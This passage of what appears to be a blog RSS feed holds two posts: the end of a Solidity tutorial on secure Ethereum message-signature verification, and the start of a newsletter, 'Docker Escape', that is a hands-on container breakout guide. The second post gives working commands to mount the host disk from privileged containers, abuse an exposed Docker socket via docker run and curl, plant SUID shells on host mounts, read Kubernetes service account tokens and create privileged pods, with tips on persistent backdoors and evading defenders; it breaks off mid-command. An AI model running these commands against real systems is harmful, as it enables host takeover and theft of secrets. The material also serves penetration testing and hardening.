     * @notice Verify signature with nonce-based replay protection
     * @param message The message to verify (must include nonce)
     * @param nonce The nonce value included in the message
     * @param signature The signature to verify
     * @param expectedSigner The expected signing address
     * @return bool True if valid
     * @dev The message must be constructed with the nonce before signing
     *      Example: &quot;Transfer 100 tokens. Nonce: 5&quot;
     *      The nonce parameter must match the value in the message and the stored nonce
     */
    function verifyWithNonce(
        string memory message,
        uint256 nonce,
        bytes memory signature,
        address expectedSigner
    ) public returns (bool) {
        // SECURITY: Validate nonce matches stored value
        require(nonce == nonces[expectedSigner], &quot;Invalid nonce&quot;);

        // SECURITY: Use standard EIP-191 hash (nonce must be in message text)
        bytes32 messageHash = getEthSignedMessageHash(message);

        // Recover and verify signer
        address recoveredSigner = recoverSigner(messageHash, signature);
        require(recoveredSigner == expectedSigner, &quot;Invalid signature&quot;);

        // SECURITY: Increment nonce to prevent replay
        nonces[expectedSigner]++;
        return true;
    }

    /**
     * @notice Verify signature with single-use enforcement
     * @param message The message to verify
     * @param signature The signature to verify (will be marked as used)
     * @param expectedSigner The expected signing address
     * @return bool True if valid
     */
    function verifyOnce(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public returns (bool) {
        bytes32 sigHash = keccak256(signature);

        // SECURITY: Ensure signature hasn&apos;t been used
        require(!usedSignatures[sigHash], &quot;Signature already used&quot;);

        // Verify the signature
        bytes32 messageHash = getEthSignedMessageHash(message);
        address recoveredSigner = recoverSigner(messageHash, signature);
        require(recoveredSigner == expectedSigner, &quot;Invalid signature&quot;);

        // SECURITY: Mark signature as used
        usedSignatures[sigHash] = true;
        return true;
    }

    /**
     * @notice Construct EIP-191 prefixed message hash
     * @param message The original message
     * @return bytes32 The Keccak-256 hash of the prefixed message
     */
    function getEthSignedMessageHash(string memory message)
        public
        pure
        returns (bytes32)
    {
        // EIP-191 version 0x45: &quot;\x19Ethereum Signed Message:\n&quot; + len + message
        bytes memory messageBytes = bytes(message);
        return keccak256(
            abi.encodePacked(
                &quot;\x19Ethereum Signed Message:\n&quot;,
                uintToString(messageBytes.length),
                messageBytes
            )
        );
    }

    /**
     * @notice Recover signer address from message hash and signature
     * @param messageHash The hash that was signed
     * @param signature The 65-byte signature (r + s + v)
     * @return address The recovered signer address
     */
    function recoverSigner(
        bytes32 messageHash,
        bytes memory signature
    ) public pure returns (address) {
        // SECURITY: Signature must be exactly 65 bytes
        require(signature.length == 65, &quot;Invalid signature length&quot;);

        // Extract r, s, v components
        bytes32 r;
        bytes32 s;
        uint8 v;

        // Use assembly for gas-efficient extraction
        // Memory layout: [32-byte length][32-byte r][32-byte s][1-byte v]
        assembly {
            // Load r: bytes 0-31 of signature data
            // Offset 32 skips the length prefix stored by Solidity
            r := mload(add(signature, 32))

            // Load s: bytes 32-63 of signature data
            // Offset 64 = 32 (length prefix) + 32 (r component)
            s := mload(add(signature, 64))

            // Load v: byte 64 of signature data
            // Offset 96 = 32 (length) + 32 (r) + 32 (s)
            // Use byte(0, ...) to extract only the first byte
            v := byte(0, mload(add(signature, 96)))
        }

        // SECURITY: Normalize v to 27 or 28
        // Some libraries return v as 0 or 1
        if (v &lt; 27) {
            v += 27;
        }
        require(v == 27 || v == 28, &quot;Invalid v value&quot;);

        // Call ecrecover precompile
        // VULNERABILITY WARNING: ecrecover returns address(0) on failure!
        address signer = ecrecover(messageHash, v, r, s);

        // SECURITY: Always check for zero address
        require(signer != address(0), &quot;Invalid signature&quot;);

        return signer;
    }

    /**
     * @notice Convert uint to string (helper for EIP-191 length encoding)
     * @param value The uint to convert
     * @return string The string representation
     */
    function uintToString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return &quot;0&quot;;
        }

        uint256 temp = value;
        uint256 digits;

        // Count digits
        while (temp != 0) {
            digits++;
            temp /= 10;
        }

        bytes memory buffer = new bytes(digits);

        // Convert each digit
        while (value != 0) {
            digits--;
            buffer[digits] = bytes1(uint8(48 + (value % 10)));
            value /= 10;
        }

        return string(buffer);
    }

    /**
     * @notice Get current nonce for an address
     * @param user The address to check
     * @return uint256 The current nonce
     */
    function getNonce(address user) public view returns (uint256) {
        return nonces[user];
    }
}
```

&lt;/details&gt;

This contract demonstrates three security patterns:

**1. Basic verification (`verifyPersonalSign`)**
- Reconstructs the EIP-191 prefix: `\x19Ethereum Signed Message:\n` + length + message
- Uses `ecrecover` to extract the signer
- Compares recovered signer to expected address
- **No replay protection** - signature can be reused

**2. Nonce-based verification (`verifyWithNonce`)**
- Requires nonce to be included in the message text before signing
- Example: &quot;Transfer 100 tokens. Nonce: 5&quot;
- **Validates nonce matches stored value** - rejects old or future nonces
- Increments nonce after successful verification
- **Prevents replay** - each nonce works only once sequentially
- Caller must provide the nonce value as a parameter for validation

**3. Single-use verification (`verifyOnce`)**
- Tracks signature hashes in a mapping
- Rejects signatures that have been used before
- **Alternative to nonces** - useful when signer doesn&apos;t track nonces

### Important ecrecover Behavior

The [Solidity documentation](https://docs.soliditylang.org/en/latest/units-and-global-variables.html) states that `ecrecover` &quot;returns zero on error&quot;. This is an important security consideration:

```solidity
// VULNERABILITY: Not checking for zero address
address signer = ecrecover(hash, v, r, s);
if (signer == expectedSigner) {
    // If ecrecover fails (returns 0x0), this check passes
    // when expectedSigner is also 0x0 (default value)!
}

// FIX: Always validate the recovered address
address signer = ecrecover(hash, v, r, s);
require(signer != address(0), &quot;Invalid signature&quot;);
require(signer == expectedSigner, &quot;Wrong signer&quot;);
```

According to [OpenZeppelin&apos;s ECDSA library documentation](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA), ecrecover can fail and return `address(0)` for several reasons:
- Invalid signature parameters
- Malformed signature data
- Incorrect message hash

Always check for the zero address before trusting the result.

### Deploying and Testing with Foundry

Let&apos;s deploy this contract to a local blockchain using Foundry&apos;s Anvil and test it with a real deployment. This gives you hands-on experience with on-chain signature verification.

#### Prerequisites

Install Foundry if you haven&apos;t already:
```bash
curl -L https://foundry.paradigm.xyz | bash
foundryup
```

#### Step 1: Start Local Blockchain (Anvil)

Open a terminal and start Anvil:
```bash
anvil
```

Anvil starts a local Ethereum node at `http://localhost:8545` with 10 pre-funded accounts. Keep this terminal open.

You&apos;ll see output with available accounts:
```
Available Accounts
==================
(0) 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 (10000 ETH)
(1) 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 (10000 ETH)
...

Private Keys
==================
(0) 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80
...
```

#### Step 2: Deploy the Contract

In a new terminal, deploy using `forge create`:

```bash
forge create $(pwd)/SignatureVerifier.sol:SignatureVerifier \
  --rpc-url http://localhost:8545 \
  --private-key 0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80
```

The private key is Anvil&apos;s first default account (safe for local testing only).


![](/content/images/2025/11/deploy-contract.png)

*Deploy contract*


**Copy the &quot;Deployed to&quot; address** - you&apos;ll need it for testing.

#### Step 3: Test the Deployed Contract

Create a test script `test-contract.js`:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete contract testing script&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

async function testDeployedContract() {
  // Connect to local Anvil node
  const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
  const deployer = await provider.getSigner(0);

  // Create a test wallet for signing
  const testWallet = ethers.Wallet.createRandom().connect(provider);

  console.log(&quot;=== SignatureVerifier Contract Testing ===\n&quot;);
  console.log(&quot;Deployer:&quot;, await deployer.getAddress());
  console.log(&quot;Test wallet:&quot;, testWallet.address);
  console.log();

  // Contract ABI
  const abi = [
    &quot;function verifyPersonalSign(string memory message, bytes memory signature, address expectedSigner) public pure returns (bool)&quot;,
    &quot;function verifyWithNonce(string memory message, uint256 nonce, bytes memory signature, address expectedSigner) public returns (bool)&quot;,
    &quot;function verifyOnce(string memory message, bytes memory signature, address expectedSigner) public returns (bool)&quot;,
    &quot;function getNonce(address user) public view returns (uint256)&quot;
  ];

  // Replace with your deployed contract address
  const contractAddress = process.argv[2];
  if (!contractAddress) {
    console.error(&quot;Usage: node test-contract.js &lt;CONTRACT_ADDRESS&gt;&quot;);
    process.exit(1);
  }

  const contract = new ethers.Contract(contractAddress, abi, deployer);

  // Test 1: Basic signature verification
  console.log(&quot;=== Test 1: Basic Verification (verifyPersonalSign) ===&quot;);
  const message1 = &quot;Claim reward: 50 tokens&quot;;
  const signature1 = await testWallet.signMessage(message1);

  console.log(&quot;Message:&quot;, message1);
  console.log(&quot;Signature:&quot;, signature1.slice(0, 20) + &quot;...&quot;);

  const isValid = await contract.verifyPersonalSign(
    message1,
    signature1,
    testWallet.address
  );
  console.log(&quot;✓ Verification:&quot;, isValid ? &quot;PASS&quot; : &quot;FAIL&quot;);

  // Test with wrong signer
  const wrongAddress = await deployer.getAddress();
  const isInvalid = await contract.verifyPersonalSign(
    message1,
    signature1,
    wrongAddress
  );
  console.log(&quot;✓ Wrong signer rejected:&quot;, !isInvalid ? &quot;PASS&quot; : &quot;FAIL&quot;);
  console.log();

  // Test 2: Nonce-based verification
  console.log(&quot;=== Test 2: Nonce-Based Replay Protection ===&quot;);
  let nonce = await contract.getNonce(testWallet.address);
  console.log(&quot;Initial nonce:&quot;, nonce.toString());

  const message2 = `Transfer 100 tokens. Nonce: ${nonce}`;
  const signature2 = await testWallet.signMessage(message2);

  console.log(&quot;Message:&quot;, message2);

  // First submission - should succeed
  const tx1 = await contract.verifyWithNonce(
    message2,
    nonce,  // Pass nonce parameter
    signature2,
    testWallet.address
  );
  await tx1.wait();
  console.log(&quot;✓ First submission: PASS (tx:&quot;, tx1.hash.slice(0, 10) + &quot;...)&quot;);

  nonce = await contract.getNonce(testWallet.address);
  console.log(&quot;✓ Nonce incremented to:&quot;, nonce.toString());

  // Try replay - old nonce will be rejected
  console.log(&quot;Attempting replay with old nonce...&quot;);
  try {
    const tx2 = await contract.verifyWithNonce(
      message2,
      0,  // Old nonce - should fail
      signature2,
      testWallet.address
    );
    await tx2.wait();
    console.log(&quot;✗ SECURITY ISSUE: Replay succeeded (should have failed!)&quot;);
  } catch (error) {
    console.log(&quot;✓ Replay prevented:&quot;, error.reason || &quot;Invalid nonce&quot;);
  }
  console.log();

  // Test 3: Single-use signature
  console.log(&quot;=== Test 3: Single-Use Signature (verifyOnce) ===&quot;);
  const message3 = &quot;One-time action: Mint NFT&quot;;
  const signature3 = await testWallet.signMessage(message3);

  const tx3 = await contract.verifyOnce(
    message3,
    signature3,
    testWallet.address
  );
  await tx3.wait();
  console.log(&quot;✓ First use: PASS (tx:&quot;, tx3.hash.slice(0, 10) + &quot;...)&quot;);

  try {
    const tx4 = await contract.verifyOnce(message3, signature3, testWallet.address);
    await tx4.wait();
    console.log(&quot;✗ Signature reuse: FAIL (should have been prevented)&quot;);
  } catch (error) {
    console.log(&quot;✓ Signature reuse prevented:&quot;, error.reason || &quot;Signature already used&quot;);
  }
  console.log();

  console.log(&quot;=== All Tests Complete ===&quot;);
  console.log(&quot;Summary:&quot;);
  console.log(&quot;1. ✓ Basic verification works&quot;);
  console.log(&quot;2. ✓ Nonce-based replay protection works (replay rejected)&quot;);
  console.log(&quot;3. ✓ Single-use signature tracking works&quot;);
}

testDeployedContract().catch(console.error);
```

&lt;/details&gt;

Run the test script with your deployed contract address:
```bash
node test-contract.js 0x9A9f2CCfdE556A7E9Ff0848998Aa4a0CFD8863AE
```

![](/content/images/2025/11/demo.png)

*Testing SignatureVerifier contract with Foundry and Anvil*


This demonstrates three security patterns in action:

**1. `verifyPersonalSign`**: Basic verification with no replay protection. The same signature can be reused indefinitely. Use only when replay doesn&apos;t matter (e.g., read-only verification).

**2. `verifyWithNonce`**: Nonce-based replay protection. The function validates that the provided nonce matches the stored nonce before accepting the signature. After successful verification, it increments the nonce. This ensures signatures with old or future nonces are rejected, preventing replay attacks. Critical for financial operations.

**3. `verifyOnce`**: Single-use signature tracking. Each signature hash is stored after first use. Alternative to nonces when the signer doesn&apos;t track nonce state.

## Architectural Differences: Side-by-Side Comparison

Let&apos;s visualize the fundamental differences in how these signature types operate:


![](/content/images/2025/11/message-signature-diagram.svg)

*Message Signature Diagram*

![](/content/images/2025/11/transaction-signature-diagram.svg)

*Transaction Signature Diagram*



Notice the key difference: transaction signatures have automatic network verification. Message signatures require manual verification, which is where vulnerabilities enter.

### When to Use Each Type

**Use Transaction Signatures When:**
- Transferring ETH or tokens between addresses
- Calling state-changing smart contract functions
- Deploying new contracts
- You need automatic network-wide verification
- You need guaranteed replay protection
- Gas costs are acceptable

**Use Message Signatures When:**
- Implementing passwordless authentication (&quot;Sign in with Ethereum&quot;)
- Collecting off-chain votes or approvals (DAO governance)
- Creating gasless token approvals (EIP-2612 Permit)
- Building meta-transaction systems (covered in next post)
- Proving ownership without spending gas
- You need off-chain signature aggregation

**Never Use Message Signatures For:**
- Authorization without nonce/expiry/single-use protection
- Actions where replay would be catastrophic
- Systems where you can&apos;t clearly explain to users what they&apos;re authorizing
- Anything where &quot;replay this 1000 times&quot; would be devastating

## Common Verification Pitfalls

Understanding how to verify signatures is only half the battle. Let&apos;s examine two common implementation mistakes that create vulnerabilities.

### Vulnerability #1: Missing ecrecover Validation

```solidity
// VULNERABILITY: Not checking ecrecover return value
contract UnsafeVerifier {
    function verify(
        string memory message,
        bytes memory signature,
        address expectedSigner
    ) public pure returns (bool) {
        bytes32 messageHash = getEthSignedMessageHash(message);

        // VULNERABILITY: ecrecover returns address(0) on failure
        address signer = ecrecover(messageHash, v, r, s);

        // If expectedSigner is accidentally 0x0 (uninitialized),
        // this passes when it should fail!
        return signer == expectedSigner;
    }
}
```

**The Attack:**
If `expectedSigner` is `address(0)` (uninitialized variable, constructor bug, etc.) and the signature is malformed, `ecrecover` returns `address(0)`, the comparison passes, and invalid signatures are accepted.

**The Fix:**
```solidity
// FIX: Always validate ecrecover output
function verify(
    string memory message,
    bytes memory signature,
    address expectedSigner
) public pure returns (bool) {
    bytes32 messageHash = getEthSignedMessageHash(message);
    address signer = ecrecover(messageHash, v, r, s);

    // SECURITY: Check for ecrecover failure
    require(signer != address(0), &quot;Invalid signature&quot;);

    // SECURITY: Check for uninitialized expectedSigner
    require(expectedSigner != address(0), &quot;Invalid expected signer&quot;);

    return signer == expectedSigner;
}
```

### Vulnerability #2: Incorrect Prefix Reconstruction

```solidity
// VULNERABILITY: Missing EIP-191 prefix
contract WrongPrefixVerifier {
    function verify(
        string memory message,
        bytes memory signature
    ) public pure returns (bool) {
        // VULNERABILITY: Hashing raw message without EIP-191 prefix
        bytes32 messageHash = keccak256(bytes(message));

        // This will NEVER match signatures from standard wallets
        // because wallets add &quot;\x19Ethereum Signed Message:\n&lt;length&gt;&quot;
        address signer = recoverSigner(messageHash, signature);
        return signer == msg.sender;
    }
}
```

**The Problem:**
Standard Ethereum wallets (MetaMask, Ledger, etc.) automatically add the EIP-191 prefix when signing messages. If your contract hashes the raw message without the prefix, signature verification will always fail. Users can&apos;t authenticate, and the system is broken.

**The Fix:**
Always reconstruct the exact format wallets use:

```solidity
// FIX: Add EIP-191 prefix
function verify(
    string memory message,
    bytes memory signature
) public pure returns (bool) {
    // SECURITY: Include EIP-191 prefix to match wallet behavior
    bytes32 messageHash = keccak256(
        abi.encodePacked(
            &quot;\x19Ethereum Signed Message:\n&quot;,
            uintToString(bytes(message).length),
            message
        )
    );

    address signer = recoverSigner(messageHash, signature);
    require(signer != address(0), &quot;Invalid signature&quot;);
    return signer == msg.sender;
}
```

## Key Takeaways

### 1. Different Encoding Schemes

| Aspect | Transaction Signatures | Message Signatures |
|--------|----------------------|-------------------|
| **Encoding** | RLP (Recursive Length Prefix) | EIP-191 prefix variants |
| **Structure** | `RLP([nonce, gasPrice, ...])` | `0x19 &lt;version&gt; &lt;data&gt;` |
| **Hash Input** | RLP-encoded transaction | Prefixed message |
| **Built-in Fields** | nonce, chainId, gas parameters | Version byte only |
| **Standardization** | Yellow Paper (Appendix B) | [EIP-191](https://eips.ethereum.org/EIPS/eip-191) |

### 2. RLP vs EIP-191: Know What Gets Signed

**RLP** serializes complex data structures into deterministic byte arrays. Every Ethereum node uses identical RLP encoding, ensuring signatures are bound to exact transaction parameters. RLP is mandatory for transactions.

**EIP-191** provides domain separation through version bytes. The `0x19` prefix ensures signed messages cannot be mistaken for RLP-encoded transactions. The version byte (`0x00`, `0x01`, `0x45`) specifies the data structure and intended use.

### 3. Manual Verification Requires Manual Security

Transaction signatures are verified automatically by every network node. Message signatures require explicit verification logic in smart contracts or backend systems.

This means:
- You must implement replay protection (nonces, expiries, or single-use flags)
- You must validate `ecrecover` return values (check for `address(0)`)
- You must reconstruct the exact prefix format wallets use
- You must handle signature malleability and edge cases

Use [OpenZeppelin&apos;s ECDSA library](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA) instead of rolling your own. It handles these gotchas correctly.

### 4. Security Checklist

When implementing message signature verification:

**Always** reconstruct the EIP-191 prefix exactly as wallets create it

**Always** check `ecrecover` return value against `address(0)`

**Always** implement replay protection (nonces or used signature tracking)

**Always** validate signature length (must be exactly 65 bytes)

**Always** normalize `v` to 27 or 28 (some libraries use 0/1)

**Never** trust signatures without comparing recovered address to expected address

**Never** skip expiry checks if time-sensitive

**Never** assume users understand what they&apos;re signing

### 5. Users Cannot Distinguish Signatures

To users, both signature types look like cryptographic hex strings in a wallet popup. One might drain their wallet, the other might just log them in. They can&apos;t tell the difference.

This means:
- Make signed messages as clear as possible (&quot;Authorize withdrawal of 100 USDC&quot;)
- Include amounts, recipients, and actions explicitly in the message text
- Never hide important information in calldata or structured fields users can&apos;t read
- Consider using [EIP-712](https://eips.ethereum.org/EIPS/eip-712) for structured data.

## What&apos;s Next: Meta-Transactions and Gasless Execution

You now understand the two fundamental signature types. Transaction signatures operate on-chain with automatic verification. Message signatures operate off-chain with manual verification and no built-in replay protection.

Next, we combine them.

**Meta-transactions** use message signatures to authorize actions that relayers execute as on-chain transactions. Users sign messages (free), relayers submit transactions (pay gas). This enables gasless onboarding, sponsored transactions, and improved UX.

But meta-transactions introduce new attack surfaces:
- Signature replay across different relayers
- Front-running and MEV exploitation
- Nonce desynchronization between user and relayer
- Relayer trust assumptions
- Cross-chain and cross-contract replay attacks

In the next post, we&apos;ll dissect:
- How meta-transaction systems work architecturally
- The [EIP-2771](https://eips.ethereum.org/EIPS/eip-2771) trusted forwarder standard
- Real implementations (OpenZeppelin MinimalForwarder, Biconomy, GSN)
- Attack patterns specific to gasless systems
- How to build secure meta-transaction contracts

If you thought message signatures were complex, meta-transactions are where things get truly interesting. And by interesting, I mean exploitable.

## Additional Resources

### Ethereum Standards
- **[EIP-191: Signed Data Standard](https://eips.ethereum.org/EIPS/eip-191)** - Complete specification for all signature version bytes
- **[EIP-155: Simple Replay Attack Protection](https://eips.ethereum.org/EIPS/eip-155)** - ChainId inclusion in transaction signatures
- **[Ethereum Yellow Paper, Appendix B](https://ethereum.github.io/yellowpaper/paper.pdf)** - RLP encoding specification
- **[Ethereum.org RLP Documentation](https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp/)** - Accessible RLP explanation with examples

### Security Resources
- **[OpenZeppelin ECDSA Library](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA)** - Production-ready signature verification implementation
- **[Solidity Documentation: ecrecover](https://docs.soliditylang.org/en/latest/units-and-global-variables.html)** - Official documentation for the ecrecover precompile
- **[Trail of Bits: ECDSA Handle With Care](https://blog.trailofbits.com/2020/06/11/ecdsa-handle-with-care/)** - Common signature verification pitfalls</content:encoded><author>Ruben Santos</author></item><item><title>Docker Escape: Breaking Out of Containers</title><link>https://www.kayssel.com/newsletter/issue-23</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-23</guid><description>From misconfigured containers to full host compromise: a practical guide to container breakout techniques</description><pubDate>Sun, 09 Nov 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

This summer I did something I&apos;ve been meaning to do for a while: I actually sat down and learned Docker security properly. Not just the basics you pick up from running `docker run` in pentests, but really understanding how containers work under the hood and where they break.

The motivation? I wanted to build [Valeris](https://github.com/rsgbengi/valeris), a Rust-based security scanner for Docker containers. I&apos;ve been documenting the whole process in my [Docker Security series](https://www.kayssel.com/series/docker-security/), and it&apos;s been one of the most rewarding learning projects I&apos;ve done this year.

But here&apos;s the thing: once you understand how containers actually isolate processes (spoiler: they don&apos;t, not really), you start seeing escape paths everywhere. Privileged mode. Docker socket exposure. Kernel exploits. Kubernetes service account tokens. The list goes on.

Containers aren&apos;t virtual machines. They&apos;re just processes with fancy kernel tricks applied. And when those tricks fail, or when someone misconfigures them, breaking out is surprisingly straightforward.

So I wanted to take what I&apos;ve learned this summer and condense it into a practical guide. This newsletter covers the most common container escape techniques: what to look for when you land inside a container, how to exploit misconfigurations, and why these issues keep showing up in production environments.

If you want the deep dive on how Docker isolation works (namespaces, cgroups, and all that), check out [Chapter 1 of the Docker Security series](https://www.kayssel.com/post/docker-security-1/). For privilege escalation with root containers and mounted directories, [Chapter 2](https://www.kayssel.com/post/docker-security-2/) has you covered.

This newsletter focuses on the bigger picture: all the ways containers fail to be secure boundaries.

## How Containers Actually Work (The 30-Second Version)

Containers aren&apos;t VMs. They&apos;re just Linux processes isolated using **namespaces** (what a process can see) and **cgroups** (what it can use). No hypervisor. No separate kernel. Just kernel tricks.

When those tricks fail or get disabled, you&apos;re running on the host.

For the full technical breakdown, read [Docker Security Chapter 1](https://www.kayssel.com/post/docker-security-1/). For now, just know: containers share the host kernel, and that&apos;s both the performance win and the security risk.

## Why Container Escapes Matter

When you compromise a containerized application, you&apos;re not done. You&apos;re stuck in a sandbox with limited access to the actual system.

**What you can&apos;t see from inside a container:**
- Other containers running on the host
- Host filesystem (unless explicitly mounted)
- Host network interfaces (unless using host networking)
- Real process tree on the host
- Kernel modules and configuration

**But if you escape, you get:**
- Full root access to the host system
- Access to all other containers
- Cloud metadata credentials (AWS, Azure, GCP)
- Secrets, environment variables from other apps
- Ability to persist and pivot across the infrastructure

Container escapes turn limited RCE into full infrastructure compromise.

## Detecting You&apos;re in a Container

First, figure out if you&apos;re even in a container. Here are the signs:

&lt;details&gt;
&lt;summary&gt;Check for .dockerenv file:&lt;/summary&gt;

```bash
ls -la / | grep dockerenv
```

If `/.dockerenv` exists, you&apos;re in Docker.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Check cgroup entries:&lt;/summary&gt;

```bash
cat /proc/1/cgroup
```

If you see `docker` or `kubepods` in the output, you&apos;re containerized.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Check for container-specific environment variables:&lt;/summary&gt;

```bash
env | grep -i kube
env | grep -i docker
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Sparse filesystem:&lt;/summary&gt;

```bash
ls /home  # Often empty in containers
df -h     # Small, minimal filesystems
```
&lt;/details&gt;

Once you confirm you&apos;re in a container, start looking for escape paths.

## Privileged Containers: The Easy Win

Running a container with `--privileged` is the container escape equivalent of giving an attacker a gift-wrapped root shell.

**What --privileged does:**
- Disables all security restrictions
- Gives container access to all host devices
- Allows mounting the host filesystem
- Basically removes all isolation

&lt;details&gt;
&lt;summary&gt;Check if you&apos;re in a privileged container:&lt;/summary&gt;

```bash
ip link add dummy0 type dummy
```

If this succeeds, you&apos;re privileged. Non-privileged containers can&apos;t create network interfaces.
&lt;/details&gt;

### Exploiting Privileged Containers

If you&apos;re privileged, escape is trivial. Mount the host filesystem and chroot into it:

```bash
# List available disks
fdisk -l

# Create mount point
mkdir /mnt/host

# Mount the host root filesystem
mount /dev/sda1 /mnt/host

# Chroot into it
chroot /mnt/host bash

# You&apos;re now root on the host
id
```

From here, you can:
- Add SSH keys to `/root/.ssh/authorized_keys`
- Modify `/etc/passwd` or `/etc/shadow`
- Install backdoors
- Access secrets from other containers

**Pro tip:** If you want persistence, add a cron job or systemd service on the host that phones home.

## Exploiting Excessive Capabilities

Even if the container isn&apos;t fully privileged, it might have dangerous Linux capabilities enabled.

Linux capabilities split root privileges into distinct units. Containers often get more capabilities than they need.

&lt;details&gt;
&lt;summary&gt;Check your capabilities:&lt;/summary&gt;

```bash
capsh --print
```

Or:

```bash
cat /proc/self/status | grep Cap
```
&lt;/details&gt;

### CAP_SYS_ADMIN: Almost as Good as Privileged

`CAP_SYS_ADMIN` is a catch-all capability that allows mounting filesystems, among other things.

If you have it, you can mount the host filesystem:

```bash
# Check if CAP_SYS_ADMIN is set
capsh --print | grep sys_admin

# If yes, mount host filesystem
mkdir /mnt/host
mount -t ext4 /dev/sda1 /mnt/host
chroot /mnt/host bash
```

### CAP_SYS_PTRACE: Inject into Host Processes

`CAP_SYS_PTRACE` lets you attach to and manipulate processes. If you can see host processes (rare but possible), you can inject shellcode.

### CAP_DAC_READ_SEARCH: Read Any File

Bypasses file read permission checks. Combined with knowledge of where secrets are stored, you can exfiltrate sensitive data.

**Defense note:** Only grant the minimum required capabilities. Most apps don&apos;t need any beyond the default set.

## Docker Socket Exposure: The Ultimate Backdoor

Some developers mount the Docker socket (`/var/run/docker.sock`) into containers to allow them to manage other containers. This is catastrophic.

&lt;details&gt;
&lt;summary&gt;Check if the Docker socket is mounted:&lt;/summary&gt;

```bash
ls -la /var/run/docker.sock
```

If it exists and is writable, you can control Docker on the host.
&lt;/details&gt;

### Exploiting Docker Socket Access

If you have access to the socket, you can spawn a new privileged container with the host filesystem mounted:

```bash
# Check docker version
docker version

# Spawn a new privileged container with host root mounted
docker run -v /:/host -it alpine chroot /host bash
```

You&apos;re now root on the host.

**Alternative if `docker` binary isn&apos;t available:**

```bash
# Install Docker client in the container first
apk add docker  # Alpine
# or
apt-get update &amp;&amp; apt-get install docker.io  # Debian/Ubuntu

# Then run the escape
docker run -v /:/host -it alpine chroot /host bash
```

If you can&apos;t install Docker, use `curl` to interact with the socket directly:

```bash
# List containers via Docker API
curl --unix-socket /var/run/docker.sock http://localhost/containers/json

# Create a privileged container
curl --unix-socket /var/run/docker.sock -X POST \
  -H &quot;Content-Type: application/json&quot; \
  -d &apos;{&quot;Image&quot;:&quot;alpine&quot;,&quot;Cmd&quot;:[&quot;/bin/sh&quot;],&quot;HostConfig&quot;:{&quot;Binds&quot;:[&quot;/:/host&quot;],&quot;Privileged&quot;:true}}&apos; \
  http://localhost/containers/create

# Start it and attach
```

Docker socket exposure is a common misconfiguration in CI/CD pipelines, developer tooling, and monitoring containers.

## Exploiting Host Path Mounts

Containers often have host directories mounted for logs, configs, or shared data. If you&apos;re root in the container and a sensitive directory is mounted with write access, you can modify files on the host.

**Classic example: SUID binaries**

If `/tmp` or any host directory is mounted, drop a SUID `bash` binary:

```bash
cp /bin/bash /mnt/bash
chown root:root /mnt/bash
chmod 4777 /mnt/bash
```

From the host, run `./bash -p` and you&apos;re root.

**Other targets:**
- `/etc` mounted? Add cron jobs or modify `/etc/passwd`
- `/root` mounted? Drop SSH keys
- Application directories? Backdoor startup scripts

For a detailed walkthrough of this technique with practical examples, check out [Docker Security Chapter 2](https://www.kayssel.com/post/docker-security-2/) where I demonstrate the full attack chain.

## Kernel Exploits from Containers

Containers share the host kernel. If the kernel is vulnerable, you can exploit it from inside the container to break out.

**Recent examples:**

- **[CVE-2022-0847 (Dirty Pipe)](https://nvd.nist.gov/vuln/detail/CVE-2022-0847)** – Flaw in the Linux kernel pipe buffer structure allowing unprivileged users to write to read-only pages in the page cache. Affects kernel versions 5.8 through 5.16.11. While exploitation requires local access, containers with elevated privileges can leverage this for escape. CVSS: 7.8 (HIGH).

- **[CVE-2022-0185](https://nvd.nist.gov/vuln/detail/CVE-2022-0185)** – Heap-based buffer overflow in the `legacy_parse_param` function in Linux kernel&apos;s Filesystem Context. Affects kernel versions 5.1 through 5.16. Exploitable for privilege escalation and container escape. Listed in CISA&apos;s Known Exploited Vulnerabilities Catalog. CVSS: 8.4 (HIGH).

- **[CVE-2021-22555](https://nvd.nist.gov/vuln/detail/CVE-2021-22555)** – Heap out-of-bounds write in net/netfilter/x_tables.c affecting Linux since v2.6.19. Used for container escapes in the wild through heap memory corruption. Added to CISA&apos;s KEV Catalog. CVSS: 7.8 (HIGH).

&lt;details&gt;
&lt;summary&gt;Check kernel version:&lt;/summary&gt;

```bash
uname -r
```

Then search for exploits matching that version.
&lt;/details&gt;

Tools like **[linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)** can help identify kernel vulnerabilities:

```bash
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
```

If you find a viable kernel exploit, compile and run it. Successful exploitation often gives you root on the host.

**Note:** Kernel exploits can crash the system, so use them carefully in production environments (or when you don&apos;t want to alert defenders).

## Kubernetes-Specific Escapes

If you&apos;re in a Kubernetes pod, you have additional escape vectors.

### Service Account Tokens

By default, Kubernetes mounts a service account token into every pod at `/var/run/secrets/kubernetes.io/serviceaccount/token`.

&lt;details&gt;
&lt;summary&gt;Check for service account token:&lt;/summary&gt;

```bash
ls /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```
&lt;/details&gt;

With this token, you can interact with the Kubernetes API:

```bash
# Get API server URL
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# List pods in current namespace
curl -k -H &quot;Authorization: Bearer $TOKEN&quot; $APISERVER/api/v1/namespaces/default/pods

# If you have permissions, create a privileged pod
curl -k -H &quot;Authorization: Bearer $TOKEN&quot; -X POST \
  -H &quot;Content-Type: application/json&quot; \
  -d @privileged-pod.json \
